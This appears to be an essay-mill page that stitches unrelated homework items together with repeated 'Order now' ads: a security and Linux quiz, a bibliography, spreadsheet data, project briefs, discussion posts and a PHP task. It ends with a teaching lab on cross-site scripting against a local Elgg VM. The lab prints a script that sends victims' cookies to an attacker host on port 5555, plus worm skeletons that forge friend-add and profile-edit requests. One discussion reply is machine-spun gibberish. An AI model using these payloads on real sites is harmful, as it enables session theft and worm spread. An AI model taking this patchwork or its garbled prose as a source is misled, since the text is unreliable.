ISSC362 Week 5 Quiz

ISSC362 Week 5 Quiz

 

Question 1 of 20

 

5.0 Points

 

Which of the following tools allows database password cracking, ARP poisoning, enumeration, and sniffing?

 

A.Wireshark B.Nemesis C.Etherape D.Cain

 

Question 2 of 20

 

Which sniffer tool is designed to intercept and reveal passwords?

 

A.Windump B.Dsniff C.Wireshark D.All of the above

 

Question 3 of 20

 

Which of the following is a tool used for sniffing?

 

A.Hunt B.Tcpdump C.Nemesis D.SMAC

 

Question 4 of 20

 

Sniffing can be used to ___________.

 

A.troubleshoot connections B.investigate malware C.detect abnormal behavior D.All of the above

 

Question 5 of 20

 

5.0 Points

 

Which of the following attacks generally involves one computer targeting another, seeking to shut it down and deny legitimate use of its services?

 

A.Passive session hijacking B.Active session hijacking C.Denial of Service D.Covert channel

 

Question 6 of 20

 

5.0 Points

 

Which of the following attacks sends out bogus requests to any requesting device and the switch?

 

A.Spoofing B.Flooding C.Poisoning D.Hijacking

Question 7 of 20

 

Which of the following protocols is not easily sniffed?

 

A.SMTP B.HTTP C.SSH D.Telnet

 

Question 8 of 20

 

5.0 Points

 

Which of the following is an attack that actively injects packets into the network with the goal of disrupting and taking over an existing session on the network?

 

A.Sniffing B.Hijacking C.Denial of service D.Covert channel

 

Question 9 of 20

 

5.0 Points

 

Which of the following takes place on networks such as those that have a hub as the connectivity device?

 

A.Passive sniffing B.Promiscuous sniffing C.Active sniffing D.Switched sniffing

 

Question 10 of 20

 

5.0 Points

 

Which attack sends packets to a victim system with the same source and destination address and port, resulting in a system crash?

 

A.Fraggle B.Smurf C.Land D.Teardrop

 

Question 11 of 20

 

Who originally designed and created Linux?

 

A.Bill Gates B.Linus Torvalds

 

C.Steve Jobs D.Joseph Linux

 

Question 12 of 20

 

Which of the following is an application-level scanner?

 

A.Flawfinder B.SARA C.VLAD D.Nikto Simple

 

Question 13 of 20

 

5.0 Points

 

Which of the following is an early Linux firewall technology that controls traffic by checking packets?

 

A.ipchains B.iptables C.ipconfig D.ip host

 

Question 14 of 20

 

5.0 Points

 

In order to view the permissions assigned to each type of user for all the files located in a directory, which of the following Linux commands is issued?

A.dir/p B.ls -l C.cp -v D.rm -al

 

Question 15 of 20

 

5.0 Points

 

Which of the following Linux directories is considered to be similar to the Windows folder in the Microsoft operating system?

 

A./dev B./etc C./bin D./var

 

Question 16 of 20

 

5.0 Points

 

Which of the following Linux directories is the location of files that dictates access between hardware and the operating system?

 

A./dev B./etc C./bin D./var

 

Question 17 of 20

 

5.0 Points

 

Most versions of Linux make their source code available through which of the following methods?

 

A.General Public License (GPL)
B.Business Software Alliance (BSA) agreement C.K Desktop Environment (KDE)
D.UNIX

 

Question 18 of 20

 

The core component of every operating system is which of the following?

 

A.Kernel B.Shell
C.User interface D.BIOS

 

Question 19 of 20

 

In Linux, which of the following correctly denotes a hard drive in a machine?

 

A.mount_hda1 B.c:/drive1/ C./dev/hda1/ D./mnt/drive1/

 

Question 20 of 20

 

Approximately how many distributions of Linux are available in different forms and formats?

 

A.100 B.200 C.1,000 D.2,000

 

 
Do you need a similar assignment done for you from scratch? Order now!
Use Discount Code "Newclient" for a 15% Discount!

Assembly Language(Note Pad)

Akinola 1

 

Annotated Bibliography

Oehlschlaeger, Fritz. “The Stoning of Mistress Hutchinson: Meaning and Context in ‘The Lottery’.” Essays in Literature 15.2 (Fall 1988): 259-265. Rpt. in Contemporary Literary Criticism. Ed. Roger Matuz and Cathy Falk. Vol. 60. Detroit: Gale Research, 1990. Literature Resource Center. Web. 5 Oct. 2011.

 

In the above mentioned article, Mr. Oehlschlaeger explores the meaning and purpose of one of the main characters in “The Lottery” – Mrs. Hutchinson. Within Mr. Oeshlschlaeger’s article he illustrates the purpose of Mrs. Hutchinson and how she symbolized the theme of traditions versus morals. The article not only explores the character’s purpose but it also reveals what she symbolized to the village.

This source is helpful in explaining the difference between the protagonist and the antagonist within “The Lottery.” It has also been useful in identifying Mrs. Hutchinson’s role in the realm of what her actions symbolized to the reactions of the villagers.

 

Schaub, Danielle. “Shirley Jackson’s Use of Symbols in ‘The Lottery.’.” Journal of the Short Story in English 14 (Spring 1990): 79-86. Rpt. in Twentieth-Century Literary Criticism. Ed. Thomas J. Schoenberg and Lawrence J. Trudeau. Vol. 187. Detroit: Gale, 2007. Literature Resource Center. Web. 5 Oct. 2011.

Mrs. Schaub reviews the different elements that are used to enhance the enrichment of literature, by focusing on one figurative language element -symbolism. As there are numerous examples of symbolism used the in “The Lottery” it also reveals the creation and purpose of the characters’ names. Danielle Schuab identifies how symbolism was purposefully used to allow the audience to be involved within the dramatic irony of the short story.

This source will be very essential in finding how specific symbols were used in “The Lottery” and how symbolism can enhance the theme that is being used to reflect characters within the short story.

 
Do you need a similar assignment done for you from scratch? Order now!
Use Discount Code "Newclient" for a 15% Discount!

Grader Project: Excel Introductory Capstone Ch. 1-4 – Collection

Christensen

Raymond’s Art Collection Code Type of Art Issue Price Current Value Current Values Notes
AEC Anniversary Edition Canvas $0 $0 Total Value Same as Issue
LEC Limited Edition Canvas $0 $0 Average Value Increased in Value
LEP Limited Edition Print $0 $0 Lowest Value
MAE Masterwork Anniversary Edition $0 $0 Highest Value
SCE Smallwork Canvas Edition $0 $0
Art Code Type of Art Status Release Date Issue Price Paid Percent Paid Current Value Percentage Change in Value Note
The Man Who Minds the Moon LEP Retired 10/1/88 $ 145 $ 350 $ 695
Candleman LEP Retired 12/1/90 $ 160 $ 500 $ 903
Waiting for the Tide LEP Retired 1/1/93 $ 150 $ 215 $ 300
The Scholar LEP Retired 6/1/93 $ 125 $ 150 $ 325
The Royal Music Barque LEP Retired 9/1/93 $ 375 $ 275 $ 375
Six Bird Hunters in Full Camouflage LEP Retired 2/1/94 $ 165 $ 165 $ 395
Serenade for an Orange Cat LEP Retired 4/1/95 $ 125 $ 125 $ 413
Balancing Act LEP Retired 9/1/95 $ 195 $ 195 $ 395
Even As He Stopped Wobbling Wendall Realized… LEP Retired 4/1/97 $ 125 $ 250 $ 675
Levi Levitates a Stone Fish LEP Limited Availability 10/1/98 $ 800 $ 800 $ 800
A Man and His Dog LEP Retired 2/1/99 $ 145 $ 200 $ 460
Queen Mab in the Ruins LEP Limited Availability 3/1/00 $ 185 $ 185 $ 381
Visitation/Preoccupation LEC Limited Availability 7/1/01 $ 645 $ 645 $ 645
Faery Tales LEP Retired 10/1/01 $ 175 $ 175 $ 1,293
Garden Rendezvous LEC Retired 6/1/02 $ 695 $ 730 $ 750
Olde World Santa AEC Retired 10/1/02 $ 395 $ 395 $ 995
Once Upon a Time MAE Retired 3/1/04 $ 1,750 $ 2,000 $ 3,200
The Royal Processional MAE Limited Availability 1/1/05 $ 1,250 $ 1,250 $ 1,250
Madonna with Two Angeles framed LEC Limited Availability 6/1/05 $ 595 $ 476 $ 595
The Gift for Mrs. Claus AEC Retired 10/1/05 $ 425 $ 425 $ 585
The Listener LEC Retired 3/1/06 $ 650 $ 650 $ 700
Men and Angels LEP Retired 9/1/06 $ 135 $ 235 $ 425
Resistance Training LEC Retired 4/1/07 $ 295 $ 295 $ 595
Music of Heaven LEC Limited Availability 10/1/07 $ 225 $ 225 $ 225
The Burden of the Responsible Man AEC Retired 11/1/07 $ 425 $ 425 $ 1,500
First Rose SCE Retired 4/1/09 $ 195 $ 225 $ 395
The Return of the Fablemaker LEC Retired 8/1/09 $ 495 $ 495 $ 695
The Tie That Binds LEC Limited Availability 2/1/10 $ 750 $ 600 $ 750
Angel Unobserved SCE Retired 3/1/10 $ 225 $ 300 $ 475
Jonah AEC Available 4/1/10 $ 425 $ 425 $ 425
Tempus Fugit SCE Retired 4/1/10 $ 195 $ 195 $ 695
Pilates SCE Retired 10/1/10 $ 275 $ 295 $ 595
The Oldest Angel AEC Retired 11/1/10 $ 395 $ 395 $ 631
Butterfly Knight SCE Retired 3/1/11 $ 225 $ 250 $ 325
College of Magical Knowledge Personal Commission AEC Retired 7/1/11 $ 950 $ 950 $ 1,200
One Light AEC Retired 5/1/12 $ 245 $ 245 $ 795
Guardian in the Woods LEC Retired 6/1/12 $ 395 $ 395 $ 500
A Lawyer More than Adequately Attired in Fine Print AEC Retired 9/1/12 $ 475 $ 475 $ 575
Superstitions MAE Limited Availability 2/1/13 $ 950 $ 950 $ 950
Living Waters LEC Available 4/1/13 $ 395 $ 395 $ 395
Fish in A Toucan Mask LEC Retired 3/1/14 $ 495 $ 495 $ 695
City on a Hill LEC Available 5/1/15 $ 395 $ 316 $ 395
Three Clowns LEC Limited Availability 10/1/15 $ 650 $ 520 $ 650
Interrupted Voyage LEC Retired 4/1/16 $ 395 $ 395 $ 595
The Candleman LEC Retired 11/1/16 $ 395 $ 395 $ 600
Artist’s Island LEC Retired 7/1/17 $ 275 $ 275 $ 323

Purchase

Responsible Woman Anniversary Canvas
Cost of the Art $ 4,800.00
Annual Interest Rate 6.50%
Term of Loan in Years 3
Monthly Payment
 
Do you need a similar assignment done for you from scratch? Order now!
Use Discount Code "Newclient" for a 15% Discount!

IT 210 Final Project – Recommendations To The Business Owner + Milestone 1 & Milestone 2

IT 210 Final Project Guidelines and Grading Guide

Overview

The final project for this course is the creation of a research paper based on Internship Activities from the text.

The final paper should demonstrate an understanding of the materials in this course, as well as the implications of new knowledge gained. The 3–4-page paper should integrate new learning into the target company example and internship work. It may include explanations and examples from previous cases and activities.

The purpose of the final paper is for you to synthesize the learning achieved in this course by describing your understanding and application of knowledge in the area of business systems and the critical thinking process that has evolved. For this assignment you should choose any two of the concepts discussed throughout the course and integrate your research on these concepts into your case proposal for the target company.

The project is divided into two milestones, which will be submitted at various points throughout the course to scaffold learning and ensure quality final submissions. These milestones will be submitted in Modules Four and Six. The final submission will occur in Module Seven.

In this assignment, you will demonstrate your mastery of the following course outcomes:

• Understand the central role of IT in the contemporary business organization

• Understand the impact of the World Wide Web on the management of business

• Understand the various types of information systems and their implications for business management and business process engineering

• Understand the strategic role of IT in sustaining competitive advantage

• Understand the impacts of globalization on IT

• Understand security and control Issues

• Understand IT ethics and information security

Prompt

In this final case study, you will synthesize the concepts learned throughout the course based on a series of Internship Activities that are the first two milestones. Through the two assignments outlined in Milestones One and Two, you will recommend solutions to Harrison Kirby, while also incorporating additional perspectives and source material to analyze real world scenarios and provide him with options to consider as part of his strategy to increase revenue and influence customer interactions and experiences in his small business. You will leverage both the textbook and external sources to complete the final project.

From the milestone assignments, you will find that Kirby is interested in improving his business through the use of technology. As you learned in the first two cases you worked for Kirby, he is focused on revenue through e-commerce and customer experience through intelligent systems incorporated with his web presence. Take the opportunity to provide Kirby with some other technology opportunities to consider that would support his business venture in e-commerce and intelligent systems. Within your final paper, choose two of the concepts below drawn from course readings. Provide detail and an explanation for each concept, which will demonstrate how each can be leveraged to support business growth and/or create a streamlined operation for Kirby. Make sure to leverage sound examples, products, and references where appropriate to further substantiate your findings.

Course Concepts:

• Big data and knowledge management

• Wireless, mobile computing, and mobile commerce

• Social computing

• Cloud computing

• Business analytics and business intelligence solutions

Your final product should answer this question: How will technology position Harrison Kirby’s business for future growth and for the enhancement of both customer alignment and efficiency?

Specifically, the following critical elements must be addressed:

1. Case Synthesis

a) What is the purpose in Harrison Kirby asking you to collect this data and how will it impact his business? Start the assignment with 2–3 paragraphs providing a description of Kirby’s business and the industry in which he operates. In this type of contemporary business organization, what is the central role that IT is playing for Harrison Kirby?

b) Find a complementary or competing company in the same industry as Mr. Kirby’s. Take time to research the company and provide supported evidence to communicate how IT may be playing a strategic role for that company in order to maintain or gain a competitive advantage.

 

2. Security and Ethics

a) What are the security or control issues that should be addressed as part of the technology selection process for Kirby’s business?

b) Propose how you would address ethics or information security issues as part of the technology selection process for Kirby’s business.

3. Findings and Recommendations

a) As the technical liaison for Kirby, you are providing him with critical information that he will use in making decisions on expanding the use of technology to improve his practice. It is important that you write your response with conviction through well-developed recommendations based on sound reasoning and evidence.

b) Include an embedded Excel object in your final Word document submission that includes a matrix of technical options that Kirby should consider in his decision making process. The Excel file should include the columns below in an example based on cloud computing. Make sure that you communicate to Mr. Kirby the challenges he should expect to face when introducing new technology into his business.

 

Technology Concept

Product/Service Name

URL

Solution Type

Licensing/Cost

Use Case / Value Statement

Cloud Computing

Amazon AWS

http://aws.amazon.com/

Storage – Amazon EBS

30GB Free

Business continuity

Due to the sensitive nature of transaction and customer data for Kirby, he should consider a backup/storage solution where he can quickly recover from a potential catastrophe and retain customers to minimize loss and get back to business quickly.

c) Comment and provide examples of how Mr. Kirby can use this new technology to make better management decisions for his business in the future.

Articulation of Response

• Always include a title page with your name, the date, the course name/number, the title of the assignment or paper, and the revision (if applicable).

• In the body of the paper, use headings and sub-headings. Do not jump from subject to subject without providing some type of heading beforehand.

• Use correct grammar and punctuation. Capitalize the first word of a sentence.

• Make the presentation as professional as possible. Think, “If someone were to look at this paper, what would they think?” Sloppy papers may have correct answers, but they still leave an overall “messy” feeling when read.

• Make sure you understand how to cite reference material within the text of your submission (e.g., according to John, “citing in text is a key concept in this course” [Doe, 2013]).

 

Milestones

Milestone One: Internship Activity

In task 4-2, you will submit Milestone One. In this milestone, you will first read through the Internship Activity in Chapter 7. For this activity, you will conduct research to help Harrison Kirby, owner of a local golf course and golf shop, create an online presence. In this milestone, you will provide an overview of your research, discuss your research selections, and discuss how you think your research will help Kirby accomplish his goal. This milestone will be graded using the Milestone One Rubric.

Milestone Two: Technology Guide 4: Intelligent Systems—Internship Activity

In task 6-2, you will submit Milestone Two. In this milestone, you will first read through the Internship Activity in Technology Guide 4. For this activity, you will build a technology matrix in Excel for intelligent systems by researching major golf websites that use extensive product information and reporting your findings to Harrison Kirby. Include a 1–2 page narrative describing your findings, including which sites offered the best customer experience or the worst. Use examples and references in your narrative to support your findings and provide Kirby with adequate detail to help him with his project. This milestone will be graded using the Milestone Two Rubric.

 
Do you need a similar assignment done for you from scratch? Order now!
Use Discount Code "Newclient" for a 15% Discount!

Disussion -1 (Disaster Recover)

Include at least 250 words in your posting and at least 250 words in your reply.  Indicate at least one source or reference in your original post. Please see syllabus for details on submission requirements.
Module 1 Discussion Question

Search “scholar.google.com” for a company, school, or person that has been the target of a network
or system intrusion? What information was targeted? Was the attack successful? If so, what changes
were made to ensure that this vulnerability was controlled? If not, what mechanisms were in-place to protect against the intrusion.

Reply-1(Shravan)

 

Introduction: Interruption location frameworks (IDSs) are programming or equipment frameworks that robotize the way toward observing the occasions happening in a PC framework or system, examining them for indications of security issues. As system assaults have expanded in number and seriousness in the course of recent years, interruption recognition frameworks have turned into an essential expansion to the security foundation of generally associations. This direction archive is planned as a preliminary in interruption recognition, created for the individuals who need to comprehend what security objectives interruption location components serve, how to choose and design interruption discovery frameworks for their particular framework and system situations, how to deal with the yield of interruption identification frameworks, and how to incorporate interruption recognition capacities with whatever remains of the authoritative security foundation. References to other data sources are likewise accommodated the peruse who requires particular or more point by point guidance on particular interruption identification issues.

In the most recent years there has been an expanding enthusiasm for the security of process control and SCADA frameworks. Moreover, ongoing PC assaults, for example, the Stunt worm, host appeared there are gatherings with the inspiration and assets to viably assault control frameworks.

While past work has proposed new security components for control frameworks, few of them have investigated new and in a general sense distinctive research issues for anchoring control frameworks when contrasted with anchoring conventional data innovation (IT) frameworks. Specifically, the complexity of new malware assaulting control frameworks – malware including zero-days assaults, rootkits made for control frameworks, and programming marked by confided in declaration specialists – has demonstrated that it is exceptionally hard to avert and identify these assaults dependent on IT framework data.

In this paper we demonstrate how, by joining information of the physical framework under control, we can distinguish PC assaults that change the conduct of the focused on control framework. By utilizing information of the physical framework we can center around the last goal of the assault, and not on the specific instruments of how vulnerabilities are misused, and how the assault is covered up. We break down the security and well being of our components by investigating the impacts of stealthy assaults, and by guaranteeing that programmed assault reaction instruments won’t drive the framework to a hazardous state.

Conclusion:

paper is to start the dialog among control and security experts – two regions that have had little cooperation previously. We trust that control specialists can use security building to outline – in light of a blend of their prescribed procedures – control calculations that go past wellbeing and adaptation to non-critical failure, and incorporate contemplations to survive focused on assaults.

Reference:

Natasha Gude , Teemu Koponen , Justin Pettit , Ben Pfaff , Martín Casado , Nick McKeown , Scott Shenker, NOX: towards an operating system for networks, ACM SIGCOMM Computer Communication Review, v.38 n.3, July 2008  [doi>10.1145/1384609.1384625]

reply-2(Santhosh)

 

Introduction:

The article (Breach, 2014) explains about the real-world scenarios where there was a network intrusion attack performed by cyber thieves and were successful in stealing financial and customer personal identification information from one of the largest retailer companies, “Target”. The intrusion was a major blow to the company’s security because of the loss of about 110 million user’s sensitive information. Intrusion Kill Chain Framework was used to detect and analyze the type of attack and other critical information. A malware was installed on Target’s point of sales system which transferred the information such as credit/debit cards to a European server. Target’s FireEye malware intrusion detection system sent alerts about the intrusion but negligence from the IT department has created this situation because they did not take any action.

Target’s network and system intrusion:

The malware that was installed on the target’s system has collected about 11 GB of stolen user critical information during target’s busy hours and transferred the data using FTP to Russian based server (Breach, 2014). The access to the Target’s system was gained by stealing credentials from an HVAC and refrigeration company, Fazio Mechanical Services which had a remote connection to the Target’s network. The Kill Chain (Breach, 2014) was used as a cybersecurity tool to detect intrusions related to the network and software. The kill chain system has proposed a solution to the traditional software installation. Traditional software installation assumes that the system is ready to detect and fight intrusion related to network and security. However, the improvised solution proposes that the intrusion detection systems should continuously monitor the logs on the server and other systems to verify if the access is legitimate, if not take immediate action.

Conclusion:

Target breach is one of the biggest security breaches in history. Security vulnerabilities increase with the advancement of the technology which makes the outdated intrusion detection systems to fail to protect from network and system intrusions. The tools like kill chain will help companies to keep the systems secure and locked down.

Reference:
Breach, T. D. (2014). A “Kill Chain” Analysis of the 2013 Target Data Breach.

 
Do you need a similar assignment done for you from scratch? Order now!
Use Discount Code "Newclient" for a 15% Discount!

Using PHP Create A Loan Calculator That Allows For Extra Payments.

Requirements:

  • -Create a page that allows a user to enter loan information; including Loan Amount, Length of Loan (months or years), Annual Interest Rate (percentage), and Extra Payment Amount.
  • -Loan Amount is in dollars. This field is required.
  • -Length of Loan is an integer in months or years. Include a prompt (such as radio buttons or dropdown list) to indicate payment frequency is for months or years. This field is required.
  • -The loan calculation should adjust appropriately based on months or years selection.
  • -Annual Interest Rate should be entered as a percentage. This field is required.
  • -Make sure that all required fields are entered.
  • -Make sure that all entered fields are valid.
  • -Display the results of the loan calculation.
  • -Display the Monthly Payment Amount.
  • -Display the Total Amount to be paid for the loan (principle and interest).
  • -Display the Total Interest to be paid for the loan.
  • -Display an Amortization Schedule for the loan.
  • -Assume the loan starts on the first day of the following month.
  • -In the Amortization Schedule show the Payment Number, Payment Date, Payment Amount, Principle Amount, Interest Amount, Extra Payment Amount (if entered), and Loan Balance.

Extra Credit:

  • -Extra Payment Amount is in dollars and is an additional monthly amount paid towards the principle of the loan. This field is optional.
  • -If Extra Payment Amount is entered, it must be included in the loan calculation.
  • -The Extra Payment Amount should be included as part of the monthly payment.
  • -If Extra Payment Amount is entered, display the Amount of Interest Saved and the Amount of Time Saved.
  • -Store the values entered in cookies and auto populate fields with previous values from cookies.

Hints:

  • -Find a formula to calculate the payment amount.
    • -To use the formula you will need to calculate a few things based on the user input.
    • -You will need to know the number of monthly payments for the loan. Your formula might call this the length of the loan.
    • -You will need to know the interest rate per month.
  • -Now you can start.
  • -Calculate the number of monthly payments.
  • -Calculate the interest rate per month.
  • -Calculate the payment amount.
  • -You should test this by calculating manually on paper and using a php fiddle to test your code calculations.
  • -Compare your results to any online mortgage calculator.
  • -Now use a loop to display each month of the amortization table.
  • -For each month calculate the balance and the portion of the payment that is principal and interest.
  • -For the first month, the balance is the same as the loan amount.
  • -The interest portion of the payment for that month is the balance times the interest rate per month.
  • -The principal portion of the payment for that month is the payment amount minus the interest portion.
  • -The balance for that month is the balance from the previous month minus the principal portion of the payment.
 
Do you need a similar assignment done for you from scratch? Order now!
Use Discount Code "Newclient" for a 15% Discount!

Computer Security Questions

Cross-site scripting (XSS) Attacks

 

Cross-site scripting (XSS) is a type of vulnerability commonly found in web applications. This vulnerability makes it possible for attackers to inject malicious code (e.g. JavaScript programs) into victim’s web browser.

Using this malicious code, the attackers can steal the victim’s credentials, such as cookies. The access control policies (i.e., the same origin policy) employed by the browser to protect those credentials can be bypassed by exploiting the XSS vulnerability. Vulnerabilities of this kind can potentially lead to large-scale attacks.

To demonstrate what attackers can do by exploiting XSS vulnerabilities, we have set up a web application named Elgg in our pre-built Ubuntu VM image. Elgg is an open-source web application for social networking, and it has implemented a number of countermeasures to remedy the XSS threat. To demonstrate how XSS attacks work, we have commented out these countermeasures in Elgg in our installation, intentionally making Elgg vulnerable to XSS attacks. Without the countermeasures, users can post any arbitrary message, including JavaScript programs, to the user profiles. In this lab, students need to exploit this vulnerability to launch an XSS attack on the modified Elgg, in a way that is similar to what Samy Kamkar did to MySpace in 2005 through the notorious Samy worm. The ultimate goal of this attack is to spread an XSS worm among the users, such that whoever views an infected user profile will be infected, and whoever is infected will add you (i.e., the attacker) to his/her friend list.

 

Environment setup for the problem:

 

For this problem, we will assume that you have set up the Ubuntu virtual machine environment based on the instructions in the Syllabus under “Special Software Installation Requirements”.

 

We will need the following:

· Firefox web browser

· Apache web server

· Elgg web application

 

For the Firefox browser, we need to use the LiveHTTPHeaders extension for Firefox to inspect the HTTP requests and responses (available under the “Tools” menu in Firefox). The pre-built Ubuntu VM image provided to you has already installed the Firefox web browser with the required extension.

 

The Apache web server is also included in the pre-built Ubuntu image. However, the web server is not started by default. You have to first start the web server using one of the following two commands:

% sudo apache2ctl start

or

% sudo service apache2 start

 

The Elgg web application is already set up in the pre-built Ubuntu VM image. We have also created several user accounts on the Elgg server and the credentials are given below (username, password):

 

admin, seedelgg

alice, seedalice

boby, seedboby

charlie, seedcharlie

samy, seedsamy

 

You can access the Elgg server using the following URL (the Apache server needs to be started first):

http://www.xsslabelgg.com

(this URL is only accessible from inside of the virtual machine, because we have modified the /etc/hosts file to map the domain name (www.xsslabelgg.com) to the virtual machine’s local IP address 127.0.0.1).

 

Once you log in as a user in Elgg, you can access your Profile and list of Friends by clicking on icons in the upper left part of the browser window.

 

Note: Some of the project tasks require some basic familiarity with JavaScript. Wherever necessary, we provide a sample JavaScript program to help you get started.

 

 

i. Posting a Malicious Message to Display an Alert Window

 

The objective of this task is to embed a JavaScript program in your Elgg profile, such that when another user views your profile, the JavaScript program will be executed and an alert window will be displayed. The following JavaScript program will display an alert window:

 

<script>alert(‘XSS’);</script>

 

If you embed the above JavaScript code in your Profile (e.g. in the brief description field), then any user

who views your profile will see the alert window.

 

What you need to do:

1. Login as user Alice and change the “Brief description” field in your Profile such that an alert window which has the following text will open:

XSS attack by <insert your real name/s here>

2. Logout and login as user Boby, and then select user Alice from “More => Members” in the Elgg menu.

3. Include in your project document a screen printout with this alert window.

 

 

ii. Posting a Malicious Message to Display Cookies

 

The objective of this task is to embed a JavaScript program in your Elgg profile, such that when another

user views your profile, the user’s cookies will be displayed in the alert window. This can be done by adding

some additional code to the JavaScript program in the previous task:

 

<script>alert(document.cookie);</script>

Hello Everybody,

Welcome to this message board.

 

 

When a user views this message post, he/she will see a pop-up message box that displays the cookies of the user.

 

 

What you need to do:

1. Login as user Alice and change the “Brief description” field in your Profile such that an alert window which contains the user’s cookies will open.

2. Logout and login as user Charlie, and then select user Alice from “More => Members” in the Elgg menu.

3. Include in your project document a screen printout with this alert window.

 

iii. Stealing Cookies from the Victim’s Machine

 

In the previous task, the malicious JavaScript code can print out the user’s cookies; in this task, the attacker wants the JavaScript code to send the cookies to himself/herself. To achieve this, the malicious JavaScript code needs to send an HTTP request to the attacker, with the cookies appended to the request.

 

We can do this by having the malicious JavaScript code insert an <img> tag with its src attribute set to a

URL on the attacker’s website. When the JavaScript inserts the <img> tag, the browser tries to load the image from the mentioned URL and in the process ends up sending a HTTP GET request to the attacker’s website. The JavaScript given below sends the cookies to port 5555 of the attacker’s machine, where the attacker has a TCP server listening to the same port. The server can print out whatever it receives. The TCP server program is available on the course website.

 

Hello Folks,

<script>document.write(‘<img src=http://attacker_IP_address:5555?c=’ + escape(document.cookie) + ‘ >’); </script>

This script tests an XSS attack.

 

 

 

 

What you need to do:

1. Download, un-compress (it’s a TAR archive, use ‘tar xvf’ to un-compress) and compile the TCP server program (compile using the command make). The server can be found as file echoserv.tar under the Moodle forums post for Project 2. Run this server on port 5555.

2. Login as user Samy and change the “About me” field in your Profile such that the cookies of whoever is viewing Samy’s profile will be sent to the attacker’s TCP server (you need to replace ‘attacker_IP_address’ in the script above with the appropriate value). When editing the “About me” field, select the “Remove editor” option to avoid automatic re-formatting of your text.

3. Logout and login as user Alice, and then view Samy’s profile by selecting user Samy from “More => Members” in the Elgg menu.

4. Include in your project document:

a. a screen printout with the text printed by the TCP server.

b. the JavaScript script you used in step 2 above.

 

 

vi. Writing an XSS Worm

 

In this and next task, we will perform an attack similar to what Samy did to MySpace in 2005 (i.e., the Samy

Worm). First, we will write an XSS worm that does not self-propagate; in the next task, we will make it

self-propagating. From the previous task, we have learned how to steal the cookies from the victim.

 

In this task, we need to write a malicious JavaScript to forge a HTTP request directly from the victim’s browser. This attack does not require the intervention from the attacker. The JavaScript that can achieve this is called a cross-site scripting worm.

 

This task consists of two independent sub-tasks.

 

Subtask: XSS Worm that adds a friend

 

The objective of the attack in this subtask is to modify the victim’s profile and add Samy as a friend of the victim. To add a friend for the victim, we should first find out how a legitimate user adds a friend in Elgg.

More specifically, we need to figure out what is sent to the server when a user adds a friend. Firefox’s

LiveHTTPHeaders extension can help us (available under the “Tools” menu in Firefox); it can display the header and contents of any HTTP request message sent from the browser. From this, we can identify all the parameters in the request.

 

There are two common types of HTTP requests, one is HTTP GET request, and the other is HTTP POST request. These two types of HTTP requests differ in how they send the contents of the request to the server. We can use the JavaScript XMLHttpRequest object to send HTTP GET and POST requests to web applications. XMLHttpRequest can only send HTTP requests back to the server, instead of other computers, because the same-origin policy is strongly enforced for XMLHttpRequest. This is not an issue for us, because we do want to use XMLHttpRequest to send a forged HTTP request back to the Elgg server.

 

To learn how to use XMLHttpRequest, you can study these documents:

https://www.w3schools.com/xml/ajax_xmlhttprequest_create.asp

https://www.w3schools.com/xml/xml_http.asp

https://developer.mozilla.org/en-US/docs/AJAX/Getting_Started

https://www.tutorialspoint.com/ajax/what_is_xmlhttprequest.htm

 

If you are not familiar with JavaScript programming, we suggest that you study the following documents to learn some basic JavaScript functions. You will have to use some of these functions.

Essential Javascript – A Javascript Tutorial:

https://www.evl.uic.edu/luc/bvis546/Essential_Javascript_–_A_Javascript_Tutorial.pdf

 

You may also need to debug your JavaScript code. Firebug is a Firefox extension that helps you debug JavaScript code. It can point you to the precise places that contain errors. FireBug is already installed in Firefox in our pre-built Ubuntu VM image (available under the “Tools” menu in Firefox).

 

For this subtask, the worm program should do the following:

 

1. Create the correct request to add Samy to the friends list of the user who is executing the malicious code

2. Forge a HTTP GET request to add Samy as a friend.

 

Code Skeleton. We provide a skeleton of the JavaScript code that you need to write. This JavaScript code is inserted into user Samy’s profile, and any user that views Samy’s profile will then automatically add Samy as their friend. You need to fill in all the necessary details. When you include the final JavaScript code in the message posted to Samy’s profile, you need to remove all the comments, extra space, and new-line characters.

 

 

<script id=”worm” type=”text/javascript”>

var Ajax=null;

 

//Construct the HTTP request to add Samy as a friend.

var sendurl=”…”;

 

//Create and send Ajax request to add friend.

// The format of the request can be learned from LiveHttpHeaders.

Ajax=new XMLHttpRequest();

Ajax.open(“GET”,sendurl,true);

Ajax.setRequestHeader(“Host”,”www.xsslabelgg.com”);

Ajax.setRequestHeader(“Keep-Alive”,”300″);

Ajax.setRequestHeader(“Connection”,”keep-alive”);

 

// (JavaScript code to access session cookie)

Ajax.setRequestHeader(“Cookie”,document.cookie);

Ajax.setRequestHeader(“Content-Type”,”application/x-www-form-urlencoded”);

Ajax.send();

</script>

 

 

Note that in this case the GET method is used to send the HTTP request.

To modify the victim’s profile, the HTTP request sent by the worm should contain the victim’s __elgg_ts and __elgg_token values in the sendurl variable. These details are present in the web page (right-click and “View Page Source”) and the worm needs to find out and use this information using JavaScript code. The sendurl variable should also contain Samy’s id.

 

What you need to do:

1. Based on the format of the GET request to add a friend, write a JavaScript script that adds Samy to the friends list of any user who views Samy’s profile. Save your JavaScript script in a file task4-1.txt.

2. Login as user Samy and inject in the “About me” field of Samy’s profile the script from file task4-1.txt. (Make sure to select “Remove editor” before editing this field, in order to disable any automatic formatting)

3. Logout and login as user Alice, and then view Samy’s profile by selecting user Samy from “More => Members” in the Elgg menu. At this point, the malicious Javascript script will be executed and Samy will be added to Alice’s friend list.

4. Include in your project document:

a. a screen printout with Alice’s friends list after viewing Samy’s profile.

b. a printout of your JavaScript file task4-1.txt.

5. Include the file task4-1.txt in a ZIP archive and upload this ZIP archive onto the Moodle website for the course.

 

Subtask XSS Worm that changes the victim’s profile

 

The objective of the attack in this subtask is to modify the victim’s profile “About me” field to show the text “Samy is my HERO”. To do this, we should first find out how a legitimate profile change looks like in Elgg. More specifically, we need to figure out what is sent to the server when a user changes the “About me” field and saves her profile. Firefox’s LiveHTTPHeaders extension can help us (available under the “Tools” menu in Firefox); it can display the header and contents of any HTTP request message sent from the browser. From this, we can identify all the needed data in the request.

 

For this subtask, the worm program should do the following:

1. Create the correct request to add a certain piece of text into the profile of a user (the victim) who is viewing Samy’s profile

2. Forge a HTTP POST request to change the profile of the victim user.

 

Code Skeleton. We provide a skeleton of the JavaScript code that you need to write. This JavaScript code is inserted into user Samy’s profile, and any user that views Samy’s profile will then automatically have their “About me” profile field changed to a certain piece of text. You need to fill in all the necessary details. When you include the final JavaScript code in the message posted to Samy’s profile, you need to remove all the comments, extra space, and new-line characters.

 

<script id=”worm” type=”text/javascript”>

var Ajax=null;

 

//Construct the HTTP POST request to modify profile.

var sendurl=”… “;

var content= “…”;

 

//Modify Victim’s profile except for SAMY

if(…)
